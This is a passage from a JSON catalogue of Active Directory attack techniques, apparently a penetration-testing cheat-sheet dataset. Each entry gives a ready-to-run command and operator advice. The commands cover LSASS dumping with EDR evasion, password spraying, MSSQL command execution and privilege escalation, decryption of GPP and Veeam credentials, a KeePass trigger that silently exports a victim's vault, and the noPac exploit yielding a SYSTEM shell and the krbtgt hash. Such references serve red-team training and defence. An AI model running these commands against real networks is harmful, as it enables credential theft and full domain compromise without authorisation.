   2650     "description": "Nanodump is an OPSEC-aware LSASS dumper that reads process memory and writes a minidump without calling the heavily monitored MiniDumpWriteDump API, avoiding many EDR hooks. --fork clones the LSASS process and dumps the copy to reduce detection, and --valid restores the dump's signature so pypykatz or Mimikatz can parse it (nanodump writes an invalid signature by default to evade disk scanners). It requires local administrator / SeDebugPrivilege; exfil the dump and parse it offline.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp",
   2651     "mitre": [
   2652       "T1003.001"
   2653     ],
   2654     "requires": [
   2655       "Shell"
   2656     ],
   2657     "services": [
   2658       "NTLM",
   2659       "Kerberos"
   2660     ],
   2661     "references": [
   2662       "https://github.com/fortra/nanodump",
   2663       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials",
   2664       "https://attack.mitre.org/techniques/T1003/001/"
   2665     ],
   2666     "added": true
   2667   },
   2668   {
   2669     "id": "wadcoms:NetExec-LDAP-ADCS",
   2670     "toolId": "wadcoms:NetExec",
   2671     "toolName": "NetExec",
   2672     "name": "NetExec-LDAP-ADCS",
   2673     "source": "DAEMON",
   2674     "platform": [
   2675       "Linux",
   2676       "ActiveDirectory",
   2677       "Windows"
   2678     ],
   2679     "capability": [
   2680       "Enumeration",
   2681       "Discovery"
   2682     ],
   2683     "nativeCategory": [
   2684       "Enumeration",
   2685       "Discovery"
   2686     ],
   2687     "command": "# Enumerate Enterprise CAs and certificate templates over LDAP\nnxc ldap 10.10.10.1 -u john -p password123 -M adcs",
   2688     "description": "The NetExec (nxc) ldap module -M adcs enumerates Active Directory Certificate Services by querying the Configuration partition over LDAP, listing the Enterprise CAs and the certificate templates published in the domain. It is a quick way to confirm AD CS is present and to gather CA and template names before running Certipy to hunt for vulnerable (ESC) configurations. Requires any valid domain account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1",
   2689     "mitre": [],
   2690     "requires": [
   2691       "Username",
   2692       "Password"
   2693     ],
   2694     "services": [
   2695       "LDAP",
   2696       "ADCS"
   2697     ],
   2698     "references": [
   2699       "https://github.com/Pennyw0rth/NetExec",
   2700       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates",
   2701       "https://posts.specterops.io/certified-pre-owned-d95910965cd2"
   2702     ],
   2703     "added": true
   2704   },
   2705   {
   2706     "id": "wadcoms:NetExec-LDAP-MAQ",
   2707     "toolId": "wadcoms:NetExec",
   2708     "toolName": "NetExec",
   2709     "name": "NetExec-LDAP-MAQ",
   2710     "source": "DAEMON",
   2711     "platform": [
   2712       "Linux",
   2713       "ActiveDirectory",
   2714       "Windows"
   2715     ],
   2716     "capability": [
   2717       "Enumeration",
   2718       "Discovery"
   2719     ],
   2720     "nativeCategory": [
   2721       "Enumeration",
   2722       "Discovery"
   2723     ],
   2724     "command": "# Read ms-DS-MachineAccountQuota (how many computer accounts this user may add)\nnxc ldap 10.10.10.1 -u john -p password123 -M maq\n# Confirm the authenticated identity / domain SID\nnxc ldap 10.10.10.1 -u john -p password123 -M whoami",
   2725     "description": "The NetExec (nxc) ldap module -M maq reads the ms-DS-MachineAccountQuota attribute, revealing how many computer accounts an authenticated user is allowed to create (default 10). A non-zero quota is a prerequisite for attacks that need a controlled computer object, such as Resource-Based Constrained Delegation (RBCD) and Shadow Credentials. The -M whoami module confirms the authenticated context and domain SID. Both need only a valid low-privileged account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1",
   2726     "mitre": [
   2727       "T1087.002"
   2728     ],
   2729     "requires": [
   2730       "Username",
   2731       "Password"
   2732     ],
   2733     "services": [
   2734       "LDAP"
   2735     ],
   2736     "references": [
   2737       "https://github.com/Pennyw0rth/NetExec",
   2738       "https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota",
   2739       "https://attack.mitre.org/techniques/T1087/002/"
   2740     ],
   2741     "added": true
   2742   },
   2743   {
   2744     "id": "wadcoms:NetExec-MSSQL-CmdExec",
   2745     "toolId": "wadcoms:NetExec",
   2746     "toolName": "NetExec",
   2747     "name": "NetExec-MSSQL-CmdExec",
   2748     "source": "DAEMON",
   2749     "platform": [
   2750       "Linux",
   2751       "ActiveDirectory",
   2752       "Windows"
   2753     ],
   2754     "capability": [
   2755       "Execution",
   2756       "Lateral Movement"
   2757     ],
   2758     "nativeCategory": [
   2759       "Exploitation",
   2760       "Lateral Movement"
   2761     ],
   2762     "command": "# OS command via xp_cmdshell\nnxc mssql 10.10.10.1 -u john -p password123 -x \"whoami /all\"\n\n# PowerShell command\nnxc mssql 10.10.10.1 -u john -p password123 -X \"$PSVersionTable\"",
   2763     "description": "NetExec's mssql -x runs an operating-system command through xp_cmdshell (it will enable the option automatically if the login is sysadmin), returning stdout. Use -X instead to execute a PowerShell command block. Command execution runs as the SQL Server service account and requires sysadmin; enabling xp_cmdshell is a high-signal event.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   2764     "mitre": [],
   2765     "requires": [
   2766       "Username",
   2767       "Password"
   2768     ],
   2769     "services": [
   2770       "MSSQL"
   2771     ],
   2772     "references": [
   2773       "https://github.com/Pennyw0rth/NetExec",
   2774       "https://www.netexec.wiki/mssql-protocol/command-execution",
   2775       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"
   2776     ],
   2777     "added": true
   2778   },
   2779   {
   2780     "id": "wadcoms:NetExec-MSSQL-LocalAuth",
   2781     "toolId": "wadcoms:NetExec",
   2782     "toolName": "NetExec",
   2783     "name": "NetExec-MSSQL-LocalAuth",
   2784     "source": "DAEMON",
   2785     "platform": [
   2786       "Linux",
   2787       "ActiveDirectory",
   2788       "Windows"
   2789     ],
   2790     "capability": [
   2791       "Credential Access",
   2792       "Lateral Movement"
   2793     ],
   2794     "nativeCategory": [
   2795       "Credential Access",
   2796       "Lateral Movement"
   2797     ],
   2798     "command": "# Local SQL login (e.g. sa) rather than domain auth\nnxc mssql 10.10.10.1 -u sa -p password123 --local-auth\n\n# Spray a local sa password across a subnet\nnxc mssql 10.10.10.0/24 -u sa -p password123 --local-auth",
   2799     "description": "With --local-auth, NetExec authenticates the SQL Server login as a local (mixed-mode) account instead of a domain principal — the classic case being the sa account or a recovered application login. This is useful for password spraying a reused sa password across many hosts, or logging into an instance that is not domain-joined. Combine with -q, -x, or a module once authenticated.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: sa\n\n\tPassword: password123",
   2800     "mitre": [],
   2801     "requires": [
   2802       "Username",
   2803       "Password"
   2804     ],
   2805     "services": [
   2806       "MSSQL"
   2807     ],
   2808     "references": [
   2809       "https://github.com/Pennyw0rth/NetExec",
   2810       "https://www.netexec.wiki/mssql-protocol/authentication",
   2811       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"
   2812     ],
   2813     "added": true
   2814   },
   2815   {
   2816     "id": "wadcoms:NetExec-MSSQL-Priv",
   2817     "toolId": "wadcoms:NetExec",
   2818     "toolName": "NetExec",
   2819     "name": "NetExec-MSSQL-Priv",
   2820     "source": "DAEMON",
   2821     "platform": [
   2822       "Linux",
   2823       "ActiveDirectory",
   2824       "Windows"
   2825     ],
   2826     "capability": [
   2827       "Privilege Escalation",
   2828       "Execution"
   2829     ],
   2830     "nativeCategory": [
   2831       "PrivEsc",
   2832       "Exploitation"
   2833     ],
   2834     "command": "# Enumerate impersonation / db_owner privesc paths\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv\n\n# Escalate the current login to sysadmin\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv -o ACTION=privesc",
   2835     "description": "The mssql_priv NetExec module enumerates and abuses privilege-escalation paths inside a SQL Server instance — principals the login can impersonate (EXECUTE AS / IMPERSONATE), and db_owner membership on databases owned by a high-privileged principal. Run it with no options to enumerate available paths; run it with ACTION=privesc to walk the chain and grant the current login sysadmin. Add ACTION=rollback to undo the change afterwards.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   2836     "mitre": [],
   2837     "requires": [
   2838       "Username",
   2839       "Password"
   2840     ],
   2841     "services": [
   2842       "MSSQL"
   2843     ],
   2844     "references": [
   2845       "https://github.com/Pennyw0rth/NetExec",
   2846       "https://www.netexec.wiki/mssql-protocol/mssql-privesc",
   2847       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"
   2848     ],
   2849     "added": true
   2850   },
   2851   {
   2852     "id": "wadcoms:NetExec-MSSQL-Query",
   2853     "toolId": "wadcoms:NetExec",
   2854     "toolName": "NetExec",
   2855     "name": "NetExec-MSSQL-Query",
   2856     "source": "DAEMON",
   2857     "platform": [
   2858       "Linux",
   2859       "ActiveDirectory",
   2860       "Windows"
   2861     ],
   2862     "capability": [
   2863       "Enumeration",
   2864       "Discovery"
   2865     ],
   2866     "nativeCategory": [
   2867       "Enumeration",
   2868       "Discovery"
   2869     ],
   2870     "command": "nxc mssql 10.10.10.1 -u john -p password123 -q \"SELECT @@version\"\n\n# domain (Windows) auth\nnxc mssql 10.10.10.1 -u john -p password123 --windows-auth -q \"SELECT SYSTEM_USER\"",
   2871     "description": "NetExec's mssql protocol authenticates to SQL Server and runs an arbitrary T-SQL statement with -q/--query, printing the result set. It is the quickest way to fingerprint an instance (@@version), enumerate databases, or check the effective privileges of the login. Add -windows-auth to authenticate the domain account over NTLM rather than SQL auth.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   2872     "mitre": [],
   2873     "requires": [
   2874       "Username",
   2875       "Password"
   2876     ],
   2877     "services": [
   2878       "MSSQL"
   2879     ],
   2880     "references": [
   2881       "https://github.com/Pennyw0rth/NetExec",
   2882       "https://www.netexec.wiki/mssql-protocol/authentication",
   2883       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"
   2884     ],
   2885     "added": true
   2886   },
   2887   {
   2888     "id": "wadcoms:NetExec-noPac",
   2889     "toolId": "wadcoms:NetExec",
   2890     "toolName": "NetExec",
   2891     "name": "NetExec nopac Module",
   2892     "source": "DAEMON",
   2893     "platform": [
   2894       "Linux",
   2895       "ActiveDirectory",
   2896       "Windows"
   2897     ],
   2898     "capability": [
   2899       "Privilege Escalation",
   2900       "Execution"
   2901     ],
   2902     "nativeCategory": [
   2903       "PrivEsc",
   2904       "Exploitation"
   2905     ],
   2906     "command": "nxc smb 10.10.10.1 -u john -p password123 -M nopac",
   2907     "description": "The NetExec/nxc smb 'nopac' module automates the CVE-2021-42278 + CVE-2021-42287 sAMAccountName spoofing chain from a single authenticated SMB connection. It confirms the DC is vulnerable, creates and renames a machine account, and requests an impersonating service ticket, saving the resulting ccache to disk for reuse with impacket tools. Requires MachineAccountQuota > 0 and a DC missing the November 2021 patches; it is a fast way to validate the primitive during an engagement.\n\nCommand Reference:\n\n\tDomain / DC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   2908     "mitre": [],
   2909     "requires": [
   2910       "Username",
   2911       "Password"
   2912     ],
   2913     "services": [
   2914       "SMB",
   2915       "Kerberos",
   2916       "LDAP"
   2917     ],
   2918     "references": [
   2919       "https://github.com/Pennyw0rth/NetExec",
   2920       "https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"
   2921     ],
   2922     "added": true
   2923   },
   2924   {
   2925     "id": "wadcoms:NetExec-SMB-GPPAutologin",
   2926     "toolId": "wadcoms:NetExec",
   2927     "toolName": "NetExec",
   2928     "name": "NetExec-SMB-GPPAutologin",
   2929     "source": "DAEMON",
   2930     "platform": [
   2931       "Linux",
   2932       "ActiveDirectory",
   2933       "Windows"
   2934     ],
   2935     "capability": [
   2936       "Credential Access",
   2937       "Collection"
   2938     ],
   2939     "nativeCategory": [
   2940       "Credential Access",
   2941       "Collection"
   2942     ],
   2943     "command": "nxc smb 10.10.10.1 -u john -p password123 -M gpp_autologin",
   2944     "description": "The gpp_autologin module parses Registry.xml files pushed through Group Policy Preferences in SYSVOL and extracts autologon credentials (DefaultUserName / DefaultPassword) configured for interactive logon. Unlike cpassword these values are stored in cleartext, so no decryption is needed. Any domain account can read SYSVOL, making this a fast credential-hunting check against the domain controller alongside gpp_password.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   2945     "mitre": [
   2946       "T1552.006"
   2947     ],
   2948     "requires": [
   2949       "Username",
   2950       "Password"
   2951     ],
   2952     "services": [
   2953       "SMB"
   2954     ],
   2955     "references": [
   2956       "https://github.com/Pennyw0rth/NetExec",
   2957       "https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password",
   2958       "https://attack.mitre.org/techniques/T1552/006/"
   2959     ],
   2960     "added": true
   2961   },
   2962   {
   2963     "id": "wadcoms:NetExec-SMB-GPPPassword",
   2964     "toolId": "wadcoms:NetExec",
   2965     "toolName": "NetExec",
   2966     "name": "NetExec-SMB-GPPPassword",
   2967     "source": "DAEMON",
   2968     "platform": [
   2969       "Linux",
   2970       "ActiveDirectory",
   2971       "Windows"
   2972     ],
   2973     "capability": [
   2974       "Credential Access",
   2975       "Collection"
   2976     ],
   2977     "nativeCategory": [
   2978       "Credential Access",
   2979       "Collection"
   2980     ],
   2981     "command": "nxc smb 10.10.10.1 -u john -p password123 -M gpp_password",
   2982     "description": "The gpp_password module searches SYSVOL for Group Policy Preferences XML files (Groups.xml, Services.xml, ScheduledTasks.xml, etc.) that contain a cpassword attribute, then decrypts it using the AES key Microsoft published in MSDN. Any authenticated domain user can read SYSVOL, so this is a classic quick win for recovering local admin or service account passwords set via GPP. Microsoft patched (MS14-025) the ability to create new GPP passwords but did not remove existing ones, so legacy cpassword values still linger in many domains.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   2983     "mitre": [
   2984       "T1552.006"
   2985     ],
   2986     "requires": [
   2987       "Username",
   2988       "Password"
   2989     ],
   2990     "services": [
   2991       "SMB"
   2992     ],
   2993     "references": [
   2994       "https://github.com/Pennyw0rth/NetExec",
   2995       "https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password",
   2996       "https://attack.mitre.org/techniques/T1552/006/"
   2997     ],
   2998     "added": true
   2999   },
   3000   {
   3001     "id": "wadcoms:NetExec-SMB-KeePassDiscover",
   3002     "toolId": "wadcoms:NetExec",
   3003     "toolName": "NetExec",
   3004     "name": "NetExec-SMB-KeePassDiscover",
   3005     "source": "DAEMON",
   3006     "platform": [
   3007       "Linux",
   3008       "ActiveDirectory",
   3009       "Windows"
   3010     ],
   3011     "capability": [
   3012       "Discovery",
   3013       "Credential Access"
   3014     ],
   3015     "nativeCategory": [
   3016       "Discovery",
   3017       "Credential Access"
   3018     ],
   3019     "command": "nxc smb 10.10.10.1 -u john -p password123 -M keepass_discover",
   3020     "description": "The keepass_discover module remotely enumerates a target for running KeePass processes and for KeePass.config.xml configuration files, reporting the paths it finds. This is the reconnaissance step before keepass_trigger: you need the config file path to plant a malicious export trigger. Requires local admin on the target so the module can inspect processes and the user's AppData. No database is opened or modified at this stage.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   3021     "mitre": [],
   3022     "requires": [
   3023       "Username",
   3024       "Password"
   3025     ],
   3026     "services": [
   3027       "SMB"
   3028     ],
   3029     "references": [
   3030       "https://github.com/Pennyw0rth/NetExec",
   3031       "https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"
   3032     ],
   3033     "added": true
   3034   },
   3035   {
   3036     "id": "wadcoms:NetExec-SMB-KeePassTrigger",
   3037     "toolId": "wadcoms:NetExec",
   3038     "toolName": "NetExec",
   3039     "name": "NetExec-SMB-KeePassTrigger",
   3040     "source": "DAEMON",
   3041     "platform": [
   3042       "Linux",
   3043       "ActiveDirectory",
   3044       "Windows"
   3045     ],
   3046     "capability": [
   3047       "Credential Access",
   3048       "Collection"
   3049     ],
   3050     "nativeCategory": [
   3051       "Credential Access",
   3052       "Collection"
   3053     ],
   3054     "command": "nxc smb 10.10.10.1 -u john -p password123 -M keepass_trigger -o KEEPASS_CONFIG_PATH=\"C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml\"",
   3055     "description": "The keepass_trigger module abuses KeePass's trigger system: it edits KeePass.config.xml (path found via keepass_discover) to add a malicious export trigger, so the next time the victim unlocks their database KeePass silently exports every entry in cleartext to a location the operator can read. The default ACTION=ALL adds the trigger, waits, retrieves and parses the export, then cleans up. Requires local admin on the host and that the user actually opens their vault; it is noisier and higher-risk than passive hunting, so restore the config afterward.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tKeePass config path: C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml",
   3056     "mitre": [],
   3057     "requires": [
   3058       "Username",
   3059       "Password"
   3060     ],
   3061     "services": [
   3062       "SMB"
   3063     ],
   3064     "references": [
   3065       "https://github.com/Pennyw0rth/NetExec",
   3066       "https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"
   3067     ],
   3068     "added": true
   3069   },
   3070   {
   3071     "id": "wadcoms:NetExec-SMB-SpiderPlus",
   3072     "toolId": "wadcoms:NetExec",
   3073     "toolName": "NetExec",
   3074     "name": "NetExec-SMB-SpiderPlus",
   3075     "source": "DAEMON",
   3076     "platform": [
   3077       "Linux",
   3078       "ActiveDirectory",
   3079       "Windows"
   3080     ],
   3081     "capability": [
   3082       "Collection",
   3083       "Discovery"
   3084     ],
   3085     "nativeCategory": [
   3086       "Collection",
   3087       "Discovery"
   3088     ],
   3089     "command": "# JSON share/file inventory only (metadata, no downloads)\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus\n\n# Download every readable file under the size limit\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus -o DOWNLOAD_FLAG=True",
   3090     "description": "The spider_plus module walks every share the authenticated user can read and writes a per-host JSON inventory of file metadata (path, size, ctime/mtime/atime) to the output folder, giving you a fast triage map of what exists before you pull anything down. By default it only catalogs; setting DOWNLOAD_FLAG=True makes it copy files under MAX_FILE_SIZE to the loot folder. Prefer the metadata-only run first to stay quiet and avoid mass file reads. Good starting point for share enumeration at scale with a single low-priv credential.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   3091     "mitre": [],
   3092     "requires": [
   3093       "Username",
   3094       "Password"
   3095     ],
   3096     "services": [
   3097       "SMB"
   3098     ],
   3099     "references": [
   3100       "https://github.com/Pennyw0rth/NetExec",
   3101       "https://www.netexec.wiki/smb-protocol/spidering-shares"
   3102     ],
   3103     "added": true
   3104   },
   3105   {
   3106     "id": "wadcoms:NetExec-SMB-Veeam",
   3107     "toolId": "wadcoms:NetExec",
   3108     "toolName": "NetExec",
   3109     "name": "NetExec-SMB-Veeam",
   3110     "source": "DAEMON",
   3111     "platform": [
   3112       "Linux",
   3113       "ActiveDirectory",
   3114       "Windows"
   3115     ],
   3116     "capability": [
   3117       "Credential Access",
   3118       "Collection"
   3119     ],
   3120     "nativeCategory": [
   3121       "Credential Access",
   3122       "Collection"
   3123     ],
   3124     "command": "nxc smb 10.10.10.1 -u john -p password123 -M veeam",
   3125     "description": "The veeam module locates a Veeam Backup & Replication configuration database on the target, reads the stored credential records and decrypts them, recovering the accounts Veeam uses for backups (often domain or local admin). Because backup servers are commonly configured with highly privileged service accounts, this is a frequent path to escalation. Requires local admin on the Veeam server so the module can reach the backing SQL database and DPAPI material.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123",
   3126     "mitre": [],
   3127     "requires": [
   3128       "Username",
   3129       "Password"
   3130     ],
   3131     "services": [
   3132       "SMB"
   3133     ],
   3134     "references": [
   3135       "https://github.com/Pennyw0rth/NetExec",
   3136       "https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam"
   3137     ],
   3138     "added": true
   3139   },
   3140   {
   3141     "id": "wadcoms:Nltest-DomainTrusts-Discovery",
   3142     "toolId": "wadcoms:Nltest",
   3143     "toolName": "Nltest",
   3144     "name": "Nltest-DomainTrusts-Discovery",
   3145     "source": "DAEMON",
   3146     "platform": [
   3147       "Windows",
   3148       "ActiveDirectory"
   3149     ],
   3150     "capability": [
   3151       "Discovery",
   3152       "Enumeration"
   3153     ],
   3154     "nativeCategory": [
   3155       "Discovery",
   3156       "Enumeration"
   3157     ],
   3158     "command": "# List all trust relationships in the forest\nnltest /domain_trusts /all_trusts\n# Enumerate domain controllers for the domain\nnltest /dclist:test.local",
   3159     "description": "nltest.exe is a signed Windows built-in (living-off-the-land) used to map trust relationships and locate domain controllers from an existing foothold, with no third-party tooling dropped to disk. /domain_trusts /all_trusts lists every trust relationship in the forest, and /dclist:<domain> enumerates the DCs for a domain - both useful for planning cross-domain and cross-forest movement. It runs in the current user's context on any domain-joined host.\n\nCommand Reference:\n\n\tDomain: test.local",
   3160     "mitre": [
   3161       "T1482"
   3162     ],
   3163     "requires": [
   3164       "Shell"
   3165     ],
   3166     "services": [
   3167       "LDAP",
   3168       "Kerberos"
   3169     ],
   3170     "references": [
   3171       "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
   3172       "https://attack.mitre.org/techniques/T1482/",
   3173       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
   3174     ],
   3175     "added": true
   3176   },
   3177   {
   3178     "id": "wadcoms:noPac-SAMSpoof",
   3179     "toolId": "wadcoms:noPac",
   3180     "toolName": "noPac",
   3181     "name": "noPac (CVE-2021-42278 + CVE-2021-42287)",
   3182     "source": "DAEMON",
   3183     "platform": [
   3184       "Linux",
   3185       "ActiveDirectory",
   3186       "Windows"
   3187     ],
   3188     "capability": [
   3189       "Privilege Escalation",
   3190       "Execution",
   3191       "Credential Access"
   3192     ],
   3193     "nativeCategory": [
   3194       "PrivEsc",
   3195       "Exploitation",
   3196       "Credential Access"
   3197     ],
   3198     "command": "# Interactive SYSTEM shell on the DC\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -shell\n\n# Dump the krbtgt hash via secretsdump\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user krbtgt",
   3199     "description": "noPac.py (Ridter) chains CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion) to escalate from a low-privileged domain user to SYSTEM on the Domain Controller. It adds a new machine account, renames its sAMAccountName to match the DC (dropping the trailing $), requests a TGT, restores the name, then performs S4U2self to obtain a service ticket impersonating a Domain Admin. Requires MachineAccountQuota > 0 (default 10) and a DC unpatched against the November 2021 fixes. Use -shell for an interactive SYSTEM shell via smbexec or -dump to run secretsdump against the DC.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1\n\n\tDC host: DC01\n\n\tImpersonate: administrator",
   3200     "mitre": [],
   3201     "requires": [
   3202       "Username",
   3203       "Password"
   3204     ],
   3205     "services": [
   3206       "Kerberos",
   3207       "SMB",
   3208       "LDAP"
   3209     ],
   3210     "references": [
   3211       "https://github.com/Ridter/noPac",
   3212       "https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing",
   3213       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
   3214     ],
   3215     "added": true
   3216   },
   3217   {
   3218     "id": "wadcoms:noPac-Scanner",
   3219     "toolId": "wadcoms:noPac",
   3220     "toolName": "noPac",
   3221     "name": "noPac Vulnerability Scanner",
   3222     "source": "DAEMON",
   3223     "platform": [
   3224       "Linux",
   3225       "ActiveDirectory",
   3226       "Windows"
   3227     ],
   3228     "capability": [
   3229       "Enumeration",
   3230       "Discovery"
   3231     ],
   3232     "nativeCategory": [
   3233       "Enumeration",
   3234       "Discovery"
   3235     ],
   3236     "command": "python3 scanner.py test.local/john:password123 -dc-ip 10.10.10.1 -use-ldap",
   3237     "description": "scanner.py ships with Ridter's noPac and safely checks whether a Domain Controller is exploitable via the sAMAccountName spoofing chain without adding or renaming any accounts. It authenticates as a normal domain user and reports the current MachineAccountQuota and whether the DC is patched against CVE-2021-42278 / CVE-2021-42287. Run it first as a low-noise reconnaissance step before launching the full noPac.py exploit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1",
   3238     "mitre": [],
   3239     "requires": [
   3240       "Username",
   3241       "Password"
   3242     ],
   3243     "services": [
   3244       "Kerberos",
   3245       "LDAP",
   3246       "SMB"
   3247     ],
   3248     "references": [
   3249       "https://github.com/Ridter/noPac",
   3250       "https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"
   3251     ],
   3252     "added": true
   3253   },
   3254   {
   3255     "id": "wadcoms:PowerMad-NewMachineAccount",
   3256     "toolId": "wadcoms:PowerMad",
   3257     "toolName": "PowerMad",
   3258     "name": "PowerMad-NewMachineAccount",
   3259     "source": "DAEMON",
   3260     "platform": [
   3261       "Windows",
   3262       "ActiveDirectory"
   3263     ],
   3264     "capability": [
   3265       "Execution",
   3266       "Privilege Escalation"
   3267     ],
   3268     "nativeCategory": [
   3269       "Exploitation",
   3270       "PrivEsc"
   3271     ],
   3272     "command": "# Import Powermad and create a new machine account\nImport-Module .\\Powermad.ps1\nNew-MachineAccount -MachineAccount EVILPC -Password $(ConvertTo-SecureString 'password123' -AsPlainText -Force)",
   3273     "description": "Powermad's New-MachineAccount cmdlet creates a new computer account in the domain over LDAP/SAMR from a Windows foothold, abusing the default ms-DS-MachineAccountQuota (10) that lets any authenticated user add machine accounts. The resulting account, with a password you supply, is the controlled principal for RBCD and shadow-credential chains carried out with SharpAllowedToAct or Rubeus. Run it in-session as any domain user; verify the quota is non-zero first.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tNew machine account: EVILPC\n\n\tPassword: password123",
   3274     "mitre": [],
   3275     "requires": [
   3276       "PowerShell",
   3277       "Shell"
   3278     ],
   3279     "services": [
   3280       "LDAP"
   3281     ],
   3282     "references": [
   3283       "https://github.com/Kevin-Robertson/Powermad",
   3284       "https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota",
   3285       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"
   3286     ],
   3287     "added": true
   3288   },
   3289   {
   3290     "id": "wadcoms:PowerUpSQL-Get-SQLServerLinkCrawl",
   3291     "toolId": "wadcoms:PowerUpSQL",
   3292     "toolName": "PowerUpSQL",
   3293     "name": "PowerUpSQL-Get-SQLServerLinkCrawl",
   3294     "source": "DAEMON",
   3295     "platform": [
   3296       "Windows",
   3297       "ActiveDirectory"
   3298     ],
   3299     "capability": [
   3300       "Privilege Escalation",
   3301       "Lateral Movement"
   3302     ],
   3303     "nativeCategory": [
   3304       "PrivEsc",
   3305       "Lateral Movement"
   3306     ],
   3307     "command": "Import-Module .\\PowerUpSQL.ps1\n\n# Crawl all linked servers from the starting instance\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')\"\n\n# Run an OS command on any node that allows it\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"exec master..xp_cmdshell 'whoami'\"",
   3308     "description": "Get-SQLServerLinkCrawl recursively follows linked-server definitions from a starting instance, executing a query at every hop via OPENQUERY chains. Because linked servers frequently run under a higher-privileged (often sysadmin) mapped login on the remote side, crawling the graph commonly yields privilege escalation or lateral movement to instances the operator could not reach directly. Supply -Query to fingerprint each node, or drive command execution through xp_cmdshell across the chain.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1",
   3309     "mitre": [],
   3310     "requires": [
   3311       "PowerShell"
   3312     ],
   3313     "services": [
   3314       "MSSQL"
   3315     ],
   3316     "references": [
   3317       "https://github.com/NetSPI/PowerUpSQL",
   3318       "https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/",
   3319       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"
   3320     ],
   3321     "added": true
   3322   },
   3323   {
   3324     "id": "wadcoms:PowerUpSQL-GetSQLInstanceDomain",
   3325     "toolId": "wadcoms:PowerUpSQL",
   3326     "toolName": "PowerUpSQL",
   3327     "name": "PowerUpSQL-GetSQLInstanceDomain",
   3328     "source": "DAEMON",
   3329     "platform": [
   3330       "Windows",
   3331       "ActiveDirectory"
   3332     ],
   3333     "capability": [
   3334       "Discovery",
   3335       "Enumeration"
   3336     ],
   3337     "nativeCategory": [
   3338       "Discovery",
   3339       "Enumeration"
   3340     ],
   3341     "command": "Import-Module .\\PowerUpSQL.ps1\n\n# Discover SQL Server instances from SPNs in the domain\nGet-SQLInstanceDomain\n\n# Then test which ones accept the current user\nGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose",
   3342     "description": "Get-SQLInstanceDomain queries the domain via LDAP for Service Principal Names beginning with MSSQL*, revealing every registered SQL Server instance and the account it runs as without touching a single database. It is the standard domain-wide MSSQL discovery step and runs under the current user's context from a domain-joined foothold. Pipe the results into Get-SQLConnectionTestThreaded to find which instances your account can actually log into.\n\nCommand Reference:\n\n\tDomain: test.local",
   3343     "mitre": [],
   3344     "requires": [
   3345       "PowerShell"
   3346     ],
   3347     "services": [
   3348       "MSSQL",
   3349       "LDAP"
